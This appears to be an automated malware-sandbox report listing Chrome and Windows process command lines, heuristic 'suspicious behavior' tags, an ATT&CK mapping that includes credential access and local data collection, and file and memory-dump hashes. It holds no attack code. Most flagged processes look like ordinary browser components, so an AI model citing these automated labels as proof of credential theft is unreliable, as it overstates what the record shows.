"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1704 /prefetch:2
2⤵
PID:2508

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2012 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3712

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2244 /prefetch:8
2⤵
PID:3680

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2904 /prefetch:1
2⤵
PID:1940

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2924 /prefetch:1
2⤵
PID:2264

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
2⤵
PID:3740

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4628 /prefetch:8
2⤵
PID:1356

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4576 /prefetch:8
2⤵
PID:2888

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4572 /prefetch:8
2⤵
PID:2884

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4764 /prefetch:8
2⤵
PID:2420

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4968 /prefetch:8
2⤵
PID:1816

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4044

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5584 /prefetch:8
2⤵
PID:3148

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1
2⤵
PID:2976

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5576 /prefetch:8
2⤵
PID:3820

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5080 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2496

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3924 /prefetch:8
2⤵
PID:2980

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3900 /prefetch:8
2⤵
PID:3684

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5676 /prefetch:8
2⤵
PID:2344

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5668 /prefetch:8
2⤵
PID:1592

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5708 /prefetch:8
2⤵
PID:1356

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5968 /prefetch:8
2⤵
PID:2564

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5984 /prefetch:8
2⤵
PID:3612

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4816 /prefetch:1
2⤵
PID:1904

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
2⤵
PID:496

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1
2⤵
PID:2124

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
2⤵
PID:2980

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6268 /prefetch:1
2⤵
PID:2792

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2748 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:672

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=812 /prefetch:1
2⤵
PID:2916

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1
2⤵
PID:3468

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6060 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2700

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3952 /prefetch:1
2⤵
PID:3472

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6004 /prefetch:1
2⤵
PID:3964

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4128 /prefetch:8
2⤵
PID:3400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6268 /prefetch:1
2⤵
PID:3248

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
2⤵
PID:3300

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6664 /prefetch:1
2⤵
PID:2580

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6528 /prefetch:1
2⤵
PID:2688

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
2⤵
PID:2624

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6832 /prefetch:1
2⤵
PID:2812

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6828 /prefetch:1
2⤵
PID:2920

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6820 /prefetch:1
2⤵
PID:3148

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6556 /prefetch:1
2⤵
PID:3396

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6812 /prefetch:1
2⤵
PID:3360

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:1
2⤵
PID:2732

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7824 /prefetch:1
2⤵
PID:4636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8152 /prefetch:1
2⤵
PID:4736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8120 /prefetch:1
2⤵
PID:4800

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:3528

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcc7f44f50,0x7ffcc7f44f60,0x7ffcc7f44f70
2⤵
PID:2568

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2248

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:2428

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x420 0x2ec
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2096

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177
MD5
b855da5683d0295842488908b9b1e5e4

SHA1
42b374f7b495de7bcedbc06571bd0043ec37fc78

SHA256
023eb30ed1a586cfe2d24d3457feb50396b52e4ccb633b2154cfee7ba83b67a2

SHA512
dd3ae15f022249d16d322c272c813fcca1366db3f34bd3a1d6c52ba546acccf8a4aeb5203d6c94f44ef492f0402422e3f8714ef3bb3daf3bbe6e4aa05e860dec

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177
MD5
f2d0bdefbd0fd1e6ca945e1f5bf2eec7

SHA1
98b8621079438c64b7f9922c0169b3e2e4969221

SHA256
1b717055ef2c4bb10845ec94320d0afd3054f69ab720fdcb950fc62e3de83804

SHA512
189163aea0b4f0e0b2f23de0f12ab5aa22687274e7cbe9efe8720bda89f0e7ffaf4a0e7af4fa90cde178da2c6f2c09a9c83b1d1e0058eef4ef5f772c8e0bfc79

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
MD5
567cecc3df75dc852f6b57c031b91d1a

SHA1
4b94058a16b66ffda0a9bf0853ec6e0e6cd5a15f

SHA256
f305b5052cb730e7265a52c2ad1b5f5cfe406e151bfa137753805fa752217a32

SHA512
895dd6fe6862948e132d81ace0f96bc1e61285d5a532554b0987fdd31a32404e37b26bf3bb1d33070e8e35a0a2ce7116af26513c4291115dc3e189ca16431544

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
MD5
567cecc3df75dc852f6b57c031b91d1a

SHA1
4b94058a16b66ffda0a9bf0853ec6e0e6cd5a15f

SHA256
f305b5052cb730e7265a52c2ad1b5f5cfe406e151bfa137753805fa752217a32

SHA512
895dd6fe6862948e132d81ace0f96bc1e61285d5a532554b0987fdd31a32404e37b26bf3bb1d33070e8e35a0a2ce7116af26513c4291115dc3e189ca16431544

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
MD5
541c7ab7219c2c88cf5f709d110ef512

SHA1
64f6fa1b8dd00f1b4388545cb24bd9979fb39de0

SHA256
74943f411fa01eb794bf3a1ab47ee97c59c8178e7e63a7b1737ef4d2de26841e

SHA512
477daec82c8feace9e383b880ccccaa109e2b4e84bd14effb8e1f415b0f9555e74118ca237c537f331d70fd9821948078ae11d40c765ff509dde8a5256ade4e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
d34112a7b4df3c9e30ace966437c5e40

SHA1
ec07125ad2db8415cf2602d1a796dc3dfc8a54d6

SHA256
cd9665cdaf412455d6f8dbdb60c721d0cf2ac992f7cd4830d89e8c75f9cfbfbf

SHA512
49fd43e69ece9c8185ada6b6ea5bd8619cb2b31de49793d3bd80180ecf3cf8ad24cac6c494185c99623417de52465c832166f7a4890d36ac0f3be5bd7652e053

Download Submit
\??\pipe\crashpad_892_BTWYUWTYXIHTKMQN
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1812-219-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp

Filesize
64KB

Download
memory/1812-145-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp

Filesize
64KB

Download
memory/1812-185-0x00007FFCA3510000-0x00007FFCA3520000-memory.dmp

Filesize
64KB

Download
memory/1812-186-0x00007FFCA3510000-0x00007FFCA3520000-memory.dmp

Filesize
64KB

Download
memory/1812-216-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp

Filesize
64KB

Download
memory/1812-217-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp

Filesize
64KB

Download
memory/1812-218-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp

Filesize
64KB

Download
memory/1812-143-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp

Filesize
64KB

Download
memory/1812-146-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp

Filesize
64KB

Download
memory/1812-147-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp

Filesize
64KB

Download
memory/1812-144-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp

Filesize
64KB

Download
memory/2976-261-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp

Filesize
64KB

Download
memory/2976-260-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp

Filesize
64KB

Download
memory/2976-226-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp

Filesize
64KB

Download
memory/2976-229-0x00007FFCA3510000-0x00007FFCA3520000-memory.dmp

Filesize
64KB

Download
memory/2976-230-0x00007FFCA3510000-0x00007FFCA3520000-memory.dmp

Filesize
64KB

Download
memory/2976-224-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp

Filesize
64KB

Download
memory/2976-223-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp

Filesize
64KB

Download
memory/2976-225-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp

Filesize
64KB

Download
memory/2976-222-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp

Filesize
64KB

Download
memory/2976-262-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp

Filesize
64KB

Download
memory/2976-263-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp

Filesize
64KB

Download
memory/3200-134-0x000002EE16BE0000-0x000002EE16BE2000-memory.dmp

Filesize
8KB

Download
memory/3200-138-0x000002EE16BE3000-0x000002EE16BE5000-memory.dmp

Filesize
8KB

Download
memory/3200-139-0x000002EE16BE6000-0x000002EE16BE8000-memory.dmp

Filesize
8KB

Download
memory/3200-135-0x000002EE2F3B0000-0x000002EE2F3D2000-memory.dmp

Filesize
136KB

Download